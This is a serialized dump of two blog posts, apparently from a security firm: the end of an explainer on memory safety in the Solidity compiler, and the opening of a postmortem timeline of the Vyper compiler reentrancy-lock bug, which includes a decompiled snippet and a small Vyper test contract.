return\n",{"type":26,"tag":137,"props":32329,"children":32330},{"class":5559,"line":5930},[32331],{"type":26,"tag":137,"props":32332,"children":32333},{"style":5601},[32334],{"type":32,"value":32335},"  Whiskers{\n",{"type":26,"tag":137,"props":32337,"children":32338},{"class":5559,"line":5939},[32339,32344],{"type":26,"tag":137,"props":32340,"children":32341},{"style":5601},[32342],{"type":32,"value":32343},"   _useMemoryGuard ",{"type":26,"tag":137,"props":32345,"children":32346},{"style":5590},[32347],{"type":32,"value":32348},"?\n",{"type":26,"tag":137,"props":32350,"children":32351},{"class":5559,"line":6191},[32352,32357],{"type":26,"tag":137,"props":32353,"children":32354},{"style":6837},[32355],{"type":32,"value":32356},"   \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\"",{"type":26,"tag":137,"props":32358,"children":32359},{"style":5590},[32360],{"type":32,"value":32361}," :\n",{"type":26,"tag":137,"props":32363,"children":32364},{"class":5559,"line":6208},[32365],{"type":26,"tag":137,"props":32366,"children":32367},{"style":6837},[32368],{"type":32,"value":32369},"   \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n",{"type":26,"tag":137,"props":32371,"children":32372},{"class":5559,"line":6225},[32373],{"type":26,"tag":137,"props":32374,"children":32375},{"style":5601},[32376],{"type":32,"value":8457},{"type":26,"tag":35,"props":32378,"children":32379},{},[32380,32385,32387,32393],{"type":26,"tag":130,"props":32381,"children":32383},{"className":32382},[],[32384],{"type":32,"value":31973},{"type":32,"value":32386}," will now no longer have ",{"type":26,"tag":130,"props":32388,"children":32390},{"className":32389},[],[32391],{"type":32,"value":32392},"memoryguard(0x80)",{"type":32,"value":32394}," as expected.",{"type":26,"tag":5512,"props":32396,"children":32398},{"className":7055,"code":32397,"language":7054,"meta":7,"style":7},"    /// @src 0:26:371  \"contract XXX {...\"\n    mstore(64, 128)\n",[32399],{"type":26,"tag":130,"props":32400,"children":32401},{"__ignoreMap":7},[32402,32417],{"type":26,"tag":137,"props":32403,"children":32404},{"class":5559,"line":5560},[32405,32409,32413],{"type":26,"tag":137,"props":32406,"children":32407},{"style":5564},[32408],{"type":32,"value":31990},{"type":26,"tag":137,"props":32410,"children":32411},{"style":5573},[32412],{"type":32,"value":31995},{"type":26,"tag":137,"props":32414,"children":32415},{"style":5564},[32416],{"type":32,"value":32000},{"type":26,"tag":137,"props":32418,"children":32419},{"class":5559,"line":5412},[32420,32425,32429,32433,32437,32442],{"type":26,"tag":137,"props":32421,"children":32422},{"style":5682},[32423],{"type":32,"value":32424},"    mstore",{"type":26,"tag":137,"props":32426,"children":32427},{"style":5601},[32428],{"type":32,"value":165},{"type":26,"tag":137,"props":32430,"children":32431},{"style":5626},[32432],{"type":32,"value":3957},{"type":26,"tag":137,"props":32434,"children":32435},{"style":5601},[32436],{"type":32,"value":1108},{"type":26,"tag":137,"props":32438,"children":32439},{"style":5626},[32440],{"type":32,"value":32441},"128",{"type":26,"tag":137,"props":32443,"children":32444},{"style":5601},[32445],{"type":32,"value":5742},{"type":26,"tag":35,"props":32447,"children":32448},{},[32449,32451,32456,32458,32463],{"type":32,"value":32450},"Semantically, the absence of ",{"type":26,"tag":130,"props":32452,"children":32454},{"className":32453},[],[32455],{"type":32,"value":31965},{"type":32,"value":32457}," means that the IR generator is telling the optimizer that it cannot guarantee the ",{"type":26,"tag":130,"props":32459,"children":32461},{"className":32460},[],[32462],{"type":32,"value":31965},{"type":32,"value":32464}," invariant.",{"type":26,"tag":5503,"props":32466,"children":32467},{},[32468],{"type":26,"tag":35,"props":32469,"children":32470},{},[32471,32472,32477,32478,32483,32484,32489],{"type":32,"value":32058},{"type":26,"tag":130,"props":32473,"children":32475},{"className":32474},[],[32476],{"type":32,"value":32064},{"type":32,"value":32066},{"type":26,"tag":130,"props":32479,"children":32481},{"className":32480},[],[32482],{"type":32,"value":32072},{"type":32,"value":32074},{"type":26,"tag":130,"props":32485,"children":32487},{"className":32486},[],[32488],{"type":32,"value":16540},{"type":32,"value":470},{"type":26,"tag":35,"props":32491,"children":32492},{},[32493],{"type":32,"value":32494},"This makes sense. Without stricter guarantees by the programmer, memory-unsafe assembly can touch memory anywhere it wants. Because the optimizer no longer has this guarantee, it cannot use memory in any of its optimization passes.",{"type":26,"tag":92,"props":32496,"children":32498},{"id":32497},"undefined-behavior",[32499],{"type":32,"value":32500},"Undefined Behavior",{"type":26,"tag":35,"props":32502,"children":32503},{},[32504,32506,32511,32513,32518,32520,32526],{"type":32,"value":32505},"How strict is memory safety? When it comes to ",{"type":26,"tag":130,"props":32507,"children":32509},{"className":32508},[],[32510],{"type":32,"value":31965},{"type":32,"value":32512},", only touching memory after 0x80 seems to matter. Is ",{"type":26,"tag":130,"props":32514,"children":32516},{"className":32515},[],[32517],{"type":32,"value":31623},{"type":32,"value":32519}," annotated assembly that touches memory at ",{"type":26,"tag":130,"props":32521,"children":32523},{"className":32522},[],[32524],{"type":32,"value":32525},"[0x40, 0x7f]",{"type":32,"value":32527}," really safe?",{"type":26,"tag":35,"props":32529,"children":32530},{},[32531,32532,32539,32541,32546],{"type":32,"value":19206},{"type":26,"tag":41,"props":32533,"children":32536},{"href":32534,"rel":32535},"https://buildmedia.readthedocs.org/media/pdf/solidity/develop/solidity.pdf",[45],[32537],{"type":32,"value":32538},"Solidity documentation",{"type":32,"value":32540}," mentions ",{"type":26,"tag":762,"props":32542,"children":32543},{},[32544],{"type":32,"value":32545},"undefined behavior",{"type":32,"value":32547}," three times.",{"type":26,"tag":4820,"props":32549,"children":32550},{},[32551,32556,32571],{"type":26,"tag":3430,"props":32552,"children":32553},{},[32554],{"type":32,"value":32555},"The existence of a dangling reference",{"type":26,"tag":3430,"props":32557,"children":32558},{},[32559,32561],{"type":32,"value":32560},"Using verbatim improperly",{"type":26,"tag":18065,"props":32562,"children":32563},{},[32564],{"type":26,"tag":41,"props":32565,"children":32569},{"href":32566,"ariaDescribedBy":32567,"dataFootnoteRef":7,"id":32568},"#user-content-fn-2",[18072],"user-content-fnref-2",[32570],{"type":32,"value":277},{"type":26,"tag":3430,"props":32572,"children":32573},{},[32574],{"type":32,"value":32575},"Violating the memory model with in-line assembly marked as \"memory-safe\".",{"type":26,"tag":35,"props":32577,"children":32578},{},[32579],{"type":32,"value":32580},"Why does this matter?",{"type":26,"tag":35,"props":32582,"children":32583},{},[32584,32586,32593,32595,32602],{"type":32,"value":32585},"Assumptions about the program code can enable powerful optimizations - that's why ",{"type":26,"tag":41,"props":32587,"children":32590},{"href":32588,"rel":32589},"https://kristerw.blogspot.com/2016/02/how-undefined-signed-overflow-enables.html",[45],[32591],{"type":32,"value":32592},"signed integer overflow is undefined",{"type":32,"value":32594},". Strictly following the compiler model is critical. Undefined behavior materializes as tricky bugs ",{"type":26,"tag":41,"props":32596,"children":32599},{"href":32597,"rel":32598},"https://blog.regehr.org/archives/1307",[45],[32600],{"type":32,"value":32601},"years down the line",{"type":32,"value":470},{"type":26,"tag":35,"props":32604,"children":32605},{},[32606,32608,32615,32616,32621],{"type":32,"value":32607},"Going back to Solidity, the specification makes ",{"type":26,"tag":41,"props":32609,"children":32612},{"href":32610,"rel":32611},"https://docs.soliditylang.org/en/latest/internals/layout_in_memory.html",[45],[32613],{"type":32,"value":32614},"it unambiguously clear",{"type":32,"value":21124},{"type":26,"tag":762,"props":32617,"children":32618},{},[32619],{"type":32,"value":32620},"Thou shalt not modify the zero slot",{"type":32,"value":470},{"type":26,"tag":5503,"props":32623,"children":32624},{},[32625],{"type":26,"tag":35,"props":32626,"children":32627},{},[32628],{"type":32,"value":32629},"The zero slot is used as initial value for dynamic memory arrays and should never be written to (the free memory pointer points to 0x80 initially).",{"type":26,"tag":35,"props":32631,"children":32632},{},[32633,32635,32640],{"type":32,"value":32634},"Any code that touches the zero slot at 0x60 is very clearly violating the specification. Does this matter though? This is where the semantics between Solidity and YUL gets tricky. Recall that the zero slot is a construction ",{"type":26,"tag":762,"props":32636,"children":32637},{},[32638],{"type":32,"value":32639},"in Solidity",{"type":32,"value":470},{"type":26,"tag":35,"props":32642,"children":32643},{},[32644],{"type":32,"value":32645},"Even though there's no explicit guarantee that inline assembly will be emitted verbatim during generation",{"type":26,"tag":4820,"props":32647,"children":32648},{},[32649],{"type":26,"tag":3430,"props":32650,"children":32651},{},[32652,32654,32661],{"type":32,"value":32653},"It very clearly ",{"type":26,"tag":41,"props":32655,"children":32658},{"href":32656,"rel":32657},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGeneratorForStatements.cpp#L2216",[45],[32659],{"type":32,"value":32660},"holds true today",{"type":32,"value":470},{"type":26,"tag":5512,"props":32663,"children":32665},{"className":31704,"code":32664,"language":31706,"meta":7,"style":7},"bool IRGeneratorForStatements::visit(InlineAssembly const& _inlineAsm)\n{\n    setLocation(_inlineAsm);\n    if (*_inlineAsm.annotation().hasMemoryEffects && !_inlineAsm.annotation().markedMemorySafe)\n        m_context.setMemoryUnsafeInlineAssemblySeen();\n    CopyTranslate bodyCopier{_inlineAsm.dialect(), m_context, _inlineAsm.annotation().externalReferences};\n\n    yul::Statement modified = bodyCopier(_inlineAsm.operations());`\n",[32666],{"type":26,"tag":130,"props":32667,"children":32668},{"__ignoreMap":7},[32669,32709,32716,32729,32801,32822,32873,32880],{"type":26,"tag":137,"props":32670,"children":32671},{"class":5559,"line":5560},[32672,32676,32681,32686,32690,32695,32700,32705],{"type":26,"tag":137,"props":32673,"children":32674},{"style":5573},[32675],{"type":32,"value":32279},{"type":26,"tag":137,"props":32677,"children":32678},{"style":5601},[32679],{"type":32,"value":32680}," IRGeneratorForStatements::",{"type":26,"tag":137,"props":32682,"children":32683},{"style":5682},[32684],{"type":32,"value":32685},"visit",{"type":26,"tag":137,"props":32687,"children":32688},{"style":5601},[32689],{"type":32,"value":165},{"type":26,"tag":137,"props":32691,"children":32692},{"style":6009},[32693],{"type":32,"value":32694},"InlineAssembly",{"type":26,"tag":137,"props":32696,"children":32697},{"style":5573},[32698],{"type":32,"value":32699}," const&",{"type":26,"tag":137,"props":32701,"children":32702},{"style":5584},[32703],{"type":32,"value":32704}," _inlineAsm",{"type":26,"tag":137,"props":32706,"children":32707},{"style":5601},[32708],{"type":32,"value":5742},{"type":26,"tag":137,"props":32710,"children":32711},{"class":5559,"line":5412},[32712],{"type":26,"tag":137,"props":32713,"children":32714},{"style":5601},[32715],{"type":32,"value":13471},{"type":26,"tag":137,"props":32717,"children":32718},{"class":5559,"line":5417},[32719,32724],{"type":26,"tag":137,"props":32720,"children":32721},{"style":5682},[32722],{"type":32,"value":32723},"    setLocation",{"type":26,"tag":137,"props":32725,"children":32726},{"style":5601},[32727],{"type":32,"value":32728},"(_inlineAsm);\n",{"type":26,"tag":137,"props":32730,"children":32731},{"class":5559,"line":5642},[32732,32736,32740,32744,32749,32753,32758,32763,32768,32772,32776,32780,32784,32788,32792,32797],{"type":26,"tag":137,"props":32733,"children":32734},{"style":5610},[32735],{"type":32,"value":14870},{"type":26,"tag":137,"props":32737,"children":32738},{"style":5601},[32739],{"type":32,"value":4625},{"type":26,"tag":137,"props":32741,"children":32742},{"style":5590},[32743],{"type":32,"value":7152},{"type":26,"tag":137,"props":32745,"children":32746},{"style":5584},[32747],{"type":32,"value":32748},"_inlineAsm",{"type":26,"tag":137,"props":32750,"children":32751},{"style":5601},[32752],{"type":32,"value":470},{"type":26,"tag":137,"props":32754,"children":32755},{"style":5682},[32756],{"type":32,"value":32757},"annotation",{"type":26,"tag":137,"props":32759,"children":32760},{"style":5601},[32761],{"type":32,"value":32762},"().",{"type":26,"tag":137,"props":32764,"children":32765},{"style":5584},[32766],{"type":32,"value":32767},"hasMemoryEffects",{"type":26,"tag":137,"props":32769,"children":32770},{"style":5590},[32771],{"type":32,"value":16776},{"type":26,"tag":137,"props":32773,"children":32774},{"style":5590},[32775],{"type":32,"value":15455},{"type":26,"tag":137,"props":32777,"children":32778},{"style":5584},[32779],{"type":32,"value":32748},{"type":26,"tag":137,"props":32781,"children":32782},{"style":5601},[32783],{"type":32,"value":470},{"type":26,"tag":137,"props":32785,"children":32786},{"style":5682},[32787],{"type":32,"value":32757},{"type":26,"tag":137,"props":32789,"children":32790},{"style":5601},[32791],{"type":32,"value":32762},{"type":26,"tag":137,"props":32793,"children":32794},{"style":5584},[32795],{"type":32,"value":32796},"markedMemorySafe",{"type":26,"tag":137,"props":32798,"children":32799},{"style":5601},[32800],{"type":32,"value":5742},{"type":26,"tag":137,"props":32802,"children":32803},{"class":5559,"line":5745},[32804,32809,32813,32818],{"type":26,"tag":137,"props":32805,"children":32806},{"style":5584},[32807],{"type":32,"value":32808},"        m_context",{"type":26,"tag":137,"props":32810,"children":32811},{"style":5601},[32812],{"type":32,"value":470},{"type":26,"tag":137,"props":32814,"children":32815},{"style":5682},[32816],{"type":32,"value":32817},"setMemoryUnsafeInlineAssemblySeen",{"type":26,"tag":137,"props":32819,"children":32820},{"style":5601},[32821],{"type":32,"value":6267},{"type":26,"tag":137,"props":32823,"children":32824},{"class":5559,"line":5850},[32825,32830,32834,32838,32843,32848,32852,32856,32860,32864,32869],{"type":26,"tag":137,"props":32826,"children":32827},{"style":5601},[32828],{"type":32,"value":32829},"    CopyTranslate bodyCopier{",{"type":26,"tag":137,"props":32831,"children":32832},{"style":5584},[32833],{"type":32,"value":32748},{"type":26,"tag":137,"props":32835,"children":32836},{"style":5601},[32837],{"type":32,"value":470},{"type":26,"tag":137,"props":32839,"children":32840},{"style":5682},[32841],{"type":32,"value":32842},"dialect",{"type":26,"tag":137,"props":32844,"children":32845},{"style":5601},[32846],{"type":32,"value":32847},"(), m_context, ",{"type":26,"tag":137,"props":32849,"children":32850},{"style":5584},[32851],{"type":32,"value":32748},{"type":26,"tag":137,"props":32853,"children":32854},{"style":5601},[32855],{"type":32,"value":470},{"type":26,"tag":137,"props":32857,"children":32858},{"style":5682},[32859],{"type":32,"value":32757},{"type":26,"tag":137,"props":32861,"children":32862},{"style":5601},[32863],{"type":32,"value":32762},{"type":26,"tag":137,"props":32865,"children":32866},{"style":5584},[32867],{"type":32,"value":32868},"externalReferences",{"type":26,"tag":137,"props":32870,"children":32871},{"style":5601},[32872],{"type":32,"value":19170},{"type":26,"tag":137,"props":32874,"children":32875},{"class":5559,"line":5878},[32876],{"type":26,"tag":137,"props":32877,"children":32878},{"emptyLinePlaceholder":18},[32879],{"type":32,"value":6276},{"type":26,"tag":137,"props":32881,"children":32882},{"class":5559,"line":5891},[32883,32888,32892,32897,32901,32905,32909,32914],{"type":26,"tag":137,"props":32884,"children":32885},{"style":5601},[32886],{"type":32,"value":32887},"    yul::Statement modified ",{"type":26,"tag":137,"props":32889,"children":32890},{"style":5590},[32891],{"type":32,"value":289},{"type":26,"tag":137,"props":32893,"children":32894},{"style":5682},[32895],{"type":32,"value":32896}," bodyCopier",{"type":26,"tag":137,"props":32898,"children":32899},{"style":5601},[32900],{"type":32,"value":165},{"type":26,"tag":137,"props":32902,"children":32903},{"style":5584},[32904],{"type":32,"value":32748},{"type":26,"tag":137,"props":32906,"children":32907},{"style":5601},[32908],{"type":32,"value":470},{"type":26,"tag":137,"props":32910,"children":32911},{"style":5682},[32912],{"type":32,"value":32913},"operations",{"type":26,"tag":137,"props":32915,"children":32916},{"style":5601},[32917],{"type":32,"value":32918},"());`\n",{"type":26,"tag":4820,"props":32920,"children":32921},{"start":5412},[32922],{"type":26,"tag":3430,"props":32923,"children":32924},{},[32925],{"type":32,"value":32926},"It would require a pretty contrived compiler implementation to meaningfully modify assembly statements before optimization.",{"type":26,"tag":35,"props":32928,"children":32929},{},[32930],{"type":32,"value":32931},"As long as the invariants are upheld before and after the assembly block executes, the code is probably safe.",{"type":26,"tag":92,"props":32933,"children":32934},{"id":7892},[32935],{"type":32,"value":7895},{"type":26,"tag":35,"props":32937,"children":32938},{},[32939],{"type":32,"value":32940},"In this blog post, we present an exploration of the Solidity compiler. This aims to serve as a useful reference for the inquisitive. Compilers are extremely complex with implicit and explicit assumptions. When in doubt, read the source code. So what exactly is memory safety?",{"type":26,"tag":35,"props":32942,"children":32943},{},[32944],{"type":32,"value":32945},"It's a promise between YUL generation and optimization.",{"type":26,"tag":21015,"props":32947,"children":32949},{"className":32948,"dataFootnotes":7},[21018],[32950,32955],{"type":26,"tag":92,"props":32951,"children":32953},{"className":32952,"id":18072},[21023],[32954],{"type":32,"value":21026},{"type":26,"tag":4820,"props":32956,"children":32957},{},[32958,32992],{"type":26,"tag":3430,"props":32959,"children":32961},{"id":32960},"user-content-fn-1",[32962,32964,32969,32971,32977,32979,32984,32986],{"type":32,"value":32963},"As an interesting aside, ",{"type":26,"tag":130,"props":32965,"children":32967},{"className":32966},[],[32968],{"type":32,"value":31965},{"type":32,"value":32970}," is an opaque function which prevents optimizations from reasoning about the free memory pointer. This leads to some rather counterintitive behavior -- ",{"type":26,"tag":130,"props":32972,"children":32974},{"className":32973},[],[32975],{"type":32,"value":32976},"memory-unsafe",{"type":32,"value":32978}," code can ",{"type":26,"tag":762,"props":32980,"children":32981},{},[32982],{"type":32,"value":32983},"decrease",{"type":32,"value":32985}," gas consumption, especially in the YUL header. ",{"type":26,"tag":41,"props":32987,"children":32990},{"href":32988,"ariaLabel":21128,"className":32989,"dataFootnoteBackref":7},"#user-content-fnref-1",[21130],[32991],{"type":32,"value":21133},{"type":26,"tag":3430,"props":32993,"children":32995},{"id":32994},"user-content-fn-2",[32996,32998,33003,33005],{"type":32,"value":32997},"Unfortunately the documentation only presents a \"non-exhaustive list of restrictions\" on verbatim bytecode. In practice, it seems hard to ",{"type":26,"tag":762,"props":32999,"children":33000},{},[33001],{"type":32,"value":33002},"guarantee",{"type":32,"value":33004}," behavior with opaque bytes. ",{"type":26,"tag":41,"props":33006,"children":33009},{"href":33007,"ariaLabel":21148,"className":33008,"dataFootnoteBackref":7},"#user-content-fnref-2",[21130],[33010],{"type":32,"value":21133},{"type":26,"tag":7949,"props":33012,"children":33013},{},[33014],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":33016},[33017,33018,33019,33020,33021,33022,33023],{"id":31609,"depth":5412,"text":31612},{"id":31663,"depth":5412,"text":31666},{"id":31927,"depth":5412,"text":31930},{"id":31658,"depth":5412,"text":32150},{"id":32497,"depth":5412,"text":32500},{"id":7892,"depth":5412,"text":7895},{"id":18072,"depth":5412,"text":21026},"content:blog:2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety",{"_path":33028,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":33029,"description":33030,"author":8304,"image":33031,"date":33033,"isFeatured":18,"onBlogPage":18,"tags":33034,"body":33036,"_type":5433,"_id":33787,"_source":5435,"_file":33788,"_stem":33789,"_extension":5438},"/blog/2023-08-01-vyper-timeline","Vyper Hack Timeline","A timeline and postmortem for the Vyper compiler bug. Thoughts on trust assumptions, vulnerability disclosures, and whitehack recoveries.",{"src":33032,"height":17,"width":17},"/posts/vyper-timeline/header.jpg","2023-08-01",[33035,31604],"vyper",{"type":23,"children":33037,"toc":33778},[33038,33043,33048,33053,33059,33064,33082,33092,33097,33105,33115,33134,33214,33224,33384,33389,33394,33404,33411,33416,33421,33435,33440,33457,33474,33493,33503,33516,33521,33534,33539,33544,33554,33581,33591,33621,33627,33636,33642,33647,33652,33657,33663,33668,33682,33687,33692,33697,33703,33708,33721,33747,33752,33774],{"type":26,"tag":35,"props":33039,"children":33040},{},[33041],{"type":32,"value":33042},"\"Trust but verify\" is a common adage. \"Hindsight is 20/20\" is another one. The best bugs are those hiding in plain sight.",{"type":26,"tag":35,"props":33044,"children":33045},{},[33046],{"type":32,"value":33047},"Compiler bugs are located deep in the supply chain, making their effects far more widespread than normal protocol bugs. Numerous contracts across different chains were compiled with vulnerable Vyper versions - it was a race against blackhats.",{"type":26,"tag":35,"props":33049,"children":33050},{},[33051],{"type":32,"value":33052},"Here's how it all happened.",{"type":26,"tag":92,"props":33054,"children":33056},{"id":33055},"timeline",[33057],{"type":32,"value":33058},"Timeline",{"type":26,"tag":35,"props":33060,"children":33061},{},[33062],{"type":32,"value":33063},"As a note, I'll use the \"we\" pronoun loosely here. I think I personally made some insightful contributions towards the initial vulnerability discovery but countless others helped far more throughout the entire process.",{"type":26,"tag":35,"props":33065,"children":33066},{},[33067,33072,33074,33081],{"type":26,"tag":84,"props":33068,"children":33069},{},[33070],{"type":32,"value":33071},"13:10 UTC",{"type":32,"value":33073}," pETH/ETH was ",{"type":26,"tag":41,"props":33075,"children":33078},{"href":33076,"rel":33077},"https://etherscan.io/tx/0xa84aa065ce61dbb1eb50ab6ae67fc31a9da50dd2c74eefd561661bfce2f1620c",[45],[33079],{"type":32,"value":33080},"drained of $11M",{"type":32,"value":470},{"type":26,"tag":35,"props":33083,"children":33084},{},[33085,33090],{"type":26,"tag":84,"props":33086,"children":33087},{},[33088],{"type":32,"value":33089},"13:19 UTC",{"type":32,"value":33091}," Michal posted in ETHSecurity about a sudden drop in pETH price.",{"type":26,"tag":35,"props":33093,"children":33094},{},[33095],{"type":32,"value":33096},"Igor first noticed something was off. Thanks to him, we dug deeper.",{"type":26,"tag":5503,"props":33098,"children":33099},{},[33100],{"type":26,"tag":35,"props":33101,"children":33102},{},[33103],{"type":32,"value":33104},"But how did the bot reenter into add_liquidity() from remove_liquidity()?",{"type":26,"tag":35,"props":33106,"children":33107},{},[33108,33113],{"type":26,"tag":84,"props":33109,"children":33110},{},[33111],{"type":32,"value":33112},"14:01 UTC",{"type":32,"value":33114}," A warroom was formed around this comment.",{"type":26,"tag":35,"props":33116,"children":33117},{},[33118,33123,33125,33132],{"type":26,"tag":84,"props":33119,"children":33120},{},[33121],{"type":32,"value":33122},"14:07 UTC",{"type":32,"value":33124}," We decompiled the JPEGd contract ",{"type":26,"tag":41,"props":33126,"children":33129},{"href":33127,"rel":33128},"https://ethervm.io/decompile",[45],[33130],{"type":32,"value":33131},"with our favorite decompiler",{"type":32,"value":33133}," and noted a difference in reentrancy guard storage slot.",{"type":26,"tag":5512,"props":33135,"children":33139},{"className":33136,"code":33137,"language":33138,"meta":7,"style":7},"language-yul shiki shiki-themes slack-dark","// Dispatch table entry for add_liquidity(uint256[2],uint256)\nlabel_0057:\n    if (storage[0x00]) { revert(memory[0x00:0x00]); }\n    storage[0x00] = 0x01;\n\n// Dispatch table entry for remove_liquidity(uint256,uint256[2])\nlabel_1AF3:\n    if (storage[0x02]) { revert(memory[0x00:0x00]); }\n    storage[0x02] = 0x01;\n","yul",[33140],{"type":26,"tag":130,"props":33141,"children":33142},{"__ignoreMap":7},[33143,33151,33159,33167,33175,33182,33190,33198,33206],{"type":26,"tag":137,"props":33144,"children":33145},{"class":5559,"line":5560},[33146],{"type":26,"tag":137,"props":33147,"children":33148},{},[33149],{"type":32,"value":33150},"// Dispatch table entry for add_liquidity(uint256[2],uint256)\n",{"type":26,"tag":137,"props":33152,"children":33153},{"class":5559,"line":5412},[33154],{"type":26,"tag":137,"props":33155,"children":33156},{},[33157],{"type":32,"value":33158},"label_0057:\n",{"type":26,"tag":137,"props":33160,"children":33161},{"class":5559,"line":5417},[33162],{"type":26,"tag":137,"props":33163,"children":33164},{},[33165],{"type":32,"value":33166},"    if (storage[0x00]) { revert(memory[0x00:0x00]); }\n",{"type":26,"tag":137,"props":33168,"children":33169},{"class":5559,"line":5642},[33170],{"type":26,"tag":137,"props":33171,"children":33172},{},[33173],{"type":32,"value":33174},"    storage[0x00] = 0x01;\n",{"type":26,"tag":137,"props":33176,"children":33177},{"class":5559,"line":5745},[33178],{"type":26,"tag":137,"props":33179,"children":33180},{"emptyLinePlaceholder":18},[33181],{"type":32,"value":6276},{"type":26,"tag":137,"props":33183,"children":33184},{"class":5559,"line":5850},[33185],{"type":26,"tag":137,"props":33186,"children":33187},{},[33188],{"type":32,"value":33189},"// Dispatch table entry for remove_liquidity(uint256,uint256[2])\n",{"type":26,"tag":137,"props":33191,"children":33192},{"class":5559,"line":5878},[33193],{"type":26,"tag":137,"props":33194,"children":33195},{},[33196],{"type":32,"value":33197},"label_1AF3:\n",{"type":26,"tag":137,"props":33199,"children":33200},{"class":5559,"line":5891},[33201],{"type":26,"tag":137,"props":33202,"children":33203},{},[33204],{"type":32,"value":33205},"    if (storage[0x02]) { revert(memory[0x00:0x00]); }\n",{"type":26,"tag":137,"props":33207,"children":33208},{"class":5559,"line":5909},[33209],{"type":26,"tag":137,"props":33210,"children":33211},{},[33212],{"type":32,"value":33213},"    storage[0x02] = 0x01;\n",{"type":26,"tag":35,"props":33215,"children":33216},{},[33217,33222],{"type":26,"tag":84,"props":33218,"children":33219},{},[33220],{"type":32,"value":33221},"14:27 UTC",{"type":32,"value":33223}," We confirmed this behavior with a simple local test contract.",{"type":26,"tag":5512,"props":33225,"children":33227},{"className":22054,"code":33226,"language":22053,"meta":7,"style":7},"@external\n@nonreentrant(\"lock\")\ndef test(addr: address) -> bool:\n    return True\n\n@external\n@nonreentrant(\"lock\")\ndef test2(addr: address) -> bool:\n    return False\n",[33228],{"type":26,"tag":130,"props":33229,"children":33230},{"__ignoreMap":7},[33231,33239,33260,33295,33307,33314,33321,33340,33372],{"type":26,"tag":137,"props":33232,"children":33233},{"class":5559,"line":5560},[33234],{"type":26,"tag":137,"props":33235,"children":33236},{"style":5682},[33237],{"type":32,"value":33238},"@external\n",{"type":26,"tag":137,"props":33240,"children":33241},{"class":5559,"line":5412},[33242,33247,33251,33256],{"type":26,"tag":137,"props":33243,"children":33244},{"style":5682},[33245],{"type":32,"value":33246},"@nonreentrant",{"type":26,"tag":137,"props":33248,"children":33249},{"style":5601},[33250],{"type":32,"value":165},{"type":26,"tag":137,"props":33252,"children":33253},{"style":6837},[33254],{"type":32,"value":33255},"\"lock\"",{"type":26,"tag":137,"props":33257,"children":33258},{"style":5601},[33259],{"type":32,"value":5742},{"type":26,"tag":137,"props":33261,"children":33262},{"class":5559,"line":5417},[33263,33268,33273,33277,33282,33287,33291],{"type":26,"tag":137,"props":33264,"children":33265},{"style":5573},[33266],{"type":32,"value":33267},"def",{"type":26,"tag":137,"props":33269,"children":33270},{"style":5682},[33271],{"type":32,"value":33272}," test",{"type":26,"tag":137,"props":33274,"children":33275},{"style":5601},[33276],{"type":32,"value":165},{"type":26,"tag":137,"props":33278,"children":33279},{"style":5584},[33280],{"type":32,"value":33281},"addr",{"type":26,"tag":137,"props":33283,"children":33284},{"style":5601},[33285],{"type":32,"value":33286},": address) -> ",{"type":26,"tag":137,"props":33288,"children":33289},{"style":6009},[33290],{"type":32,"value":32279},{"type":26,"tag":137,"props":33292,"children":33293},{"style":5601},[33294],{"type":32,"value":8152},{"type":26,"tag":137,"props":33296,"children":33297},{"class":5559,"line":5642},[33298,33302],{"type":26,"tag":137,"props":33299,"children":33300},{"style":5610},[33301],{"type":32,"value":19582},{"type":26,"tag":137,"props":33303,"children":33304},{"style":5573},[33305],{"type":32,"value":33306}," True\n",{"type":26,"tag":137,"props":33308,"children":33309},{"class":5559,"line":5745},[33310],{"type":26,"tag":137,"props":33311,"children":33312},{"emptyLinePlaceholder":18},[33313],{"type":32,"value":6276},{"type":26,"tag":137,"props":33315,"children":33316},{"class":5559,"line":5850},[33317],{"type":26,"tag":137,"props":33318,"children":33319},{"style":5682},[33320],{"type":32,"value":33238},{"type":26,"tag":137,"props":33322,"children":33323},{"class":5559,"line":5878},[33324,33328,33332,33336],{"type":26,"tag":137,"props":33325,"children":33326},{"style":5682},[33327],{"type":32,"value":33246},{"type":26,"tag":137,"props":33329,"children":33330},{"style":5601},[33331],{"type":32,"value":165},{"type":26,"tag":137,"props":33333,"children":33334},{"style":6837},[33335],{"type":32,"value":33255},{"type":26,"tag":137,"props":33337,"children":33338},{"style":5601},[33339],{"type":32,"value":5742},{"type":26,"tag":137,"props":33341,"children":33342},{"class":5559,"line":5891},[33343,33347,33352,33356,33360,33364,33368],{"type":26,"tag":137,"props":33344,"children":33345},{"style":5573},[33346],{"type":32,"value":33267},{"type":26,"tag":137,"props":33348,"children":33349},{"style":5682},[33350],{"type":32,"value":33351}," test2",{"type":26,"tag":137,"props":33353,"children":33354},{"style":5601},[33355],{"type":32,"value":165},{"type":26,"tag":137,"props":33357,"children":33358},{"style":5584},[33359],{"type":32,"value":33281},{"type":26,"tag":137,"props":33361,"children":33362},{"style":5601},[33363],{"type":32,"value":33286},{"type":26,"tag":137,"props":33365,"children":33366},{"style":6009},[33367],{"type":32,"value":32279},{"type":26,"tag":137,"props":33369,"children":33370},{"style":5601},[33371],{"type":32,"value":8152},{"type":26,"tag":137,"props":33373,"children":33374},{"class":5559,"line":5909},[33375,33379],{"type":26,"tag":137,"props":33376,"children":33377},{"style":5610},[33378],{"type":32,"value":19582},{"type":26,"tag":137,"props":33380,"children":33381},{"style":5573},[33382],{"type":32,"value":33383}," False\n",{"type":26,"tag":35,"props":33385,"children":33386},{},[33387],{"type":32,"value":33388},"This was not just another reentrancy bug.",{"type":26,"tag":35,"props":33390,"children":33391},{},[33392],{"type":32,"value":33393},"At this point, we realized just how impactful this would be. There was a blackout of information, and we deleted public messages on the nature of the vulnerability.",{"type":26,"tag":35,"props":33395,"children":33396},{},[33397,33402],{"type":26,"tag":84,"props":33398,"children":33399},{},[33400],{"type":32,"value":33401},"14:37 UTC",{"type":32,"value":33403}," Wavey helped identify the vulnerable commit and affected versions. This was also confirmed by me and Charles by manually inspecting the Vyper compiler 